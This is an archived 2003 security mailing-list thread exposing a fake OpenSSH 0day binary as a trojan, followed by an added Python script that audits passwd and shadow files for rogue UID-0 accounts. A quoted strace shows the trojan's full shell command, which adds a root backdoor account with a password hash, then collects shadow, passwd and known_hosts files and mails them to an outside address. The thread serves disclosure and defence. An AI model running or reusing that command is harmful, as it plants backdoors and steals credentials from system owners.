I'll confirm that it does this. The script actually opens a socket and
connects to the target sshd but does nothing with that connection. It also
takes a pretty deep look into /proc/net looking for other networks attached
to the device it is run from....

chris

On Fri, 2003-09-19 at 20:02, KF wrote:
> printf("[*] sending shellcode\n")= 22
> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
> /usr/sbin/sendmail -f ownage@xxxxxx
> m0nkeyhack@xxxxxxxxxxxxx) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> 0x0804a6b0
>
>
> -KF
>
>
> gordon last wrote:
> > hi readers,
> > while i was staying idle in a so-called 0day release channel on one irc
> > network some scriptkiddies were talking about a new 0day release.
> >
> > in my backlog i can see the following:
> > ---cut
> > 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
> > 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
> > ---cut
> >
> > i looked at this piece of exploit... it is binary so i'm not sure if
> > this is a trojan or a backdoor or a virus. but i can't see anything
> > strange while sniffing the exploit traffic. and i got root on several
> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> >
> > i too looked at "strings theosshucksass" and found nothing suspicious.
> >
> > this exploit seems to be in the wild (underground) since the beginning of
> > august.
> >
> > that's quite a long time. i hope most admins are patching the systems
> > now... because the exploit is getting round faster and faster.
> >
> > if anyone can reverse engineer this piece it would be great if he posts
> > his results on this list because i am really interested in the exploiting
> > technique used for that bug.
> >
> > i can't get an idea on how to exploit this.
> >
> > hmm...
> > regards,
> > glast
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
Christopher Neitzert
http://www.neitzert.com/~chris
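The popen() call in the quoted strace output appends a second UID-0 account ("sys3") to /etc/passwd and /etc/shadow before mailing off the box's known_hosts files. Below is an added audit script, not from anyone in this thread, that flags such accounts on a host; the sample files are constructed, with the passwd line taken from the trace and placeholder hashes in place of real ones.

```python
"""Audit passwd/shadow for UID-0 accounts other than root (added example)."""
from typing import Dict, List

# Constructed sample data so the check runs offline. The sys3 passwd line
# mirrors the one in the strace output above; the shadow hashes are placeholders.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
chris:x:1000:1000:Chris:/home/chris:/bin/bash
sys3:x:0:103::/:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$placeholder$placeholderhash1:12311:0:99999:7:::
daemon:*:12311:0:99999:7:::
chris:$6$placeholder$placeholderhash2:12311:0:99999:7:::
sys3:$1$placeholder$placeholderhash3:12311:0:99999:7:::
"""

# Shadow password fields that mean "no usable password" on common systems.
LOCKED_HASHES = ("", "*", "!", "!!")


def parse_colon_file(text: str) -> Dict[str, List[str]]:
    """Map username -> fields for a passwd/shadow style file, skipping blanks/comments."""
    entries: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def rogue_uid0_accounts(passwd_text: str, shadow_text: str,
                        allowed=("root",)) -> List[dict]:
    """Return every UID-0 account not in `allowed`, noting shell, home and
    whether its shadow entry carries a usable (non-locked) password hash."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for name, f in passwd.items():
        if len(f) < 7 or not f[2].isdigit():
            continue  # malformed line, not a valid account entry
        if int(f[2]) != 0 or name in allowed:
            continue
        hash_field = shadow.get(name, [name, ""])[1]
        findings.append({"user": name, "shell": f[6], "home": f[5],
                         "has_password": hash_field not in LOCKED_HASHES})
    return findings


if __name__ == "__main__":  # reading /etc/shadow requires root
    with open("/etc/passwd") as p, open("/etc/shadow") as s:
        for finding in rogue_uid0_accounts(p.read(), s.read()):
            print(finding)
```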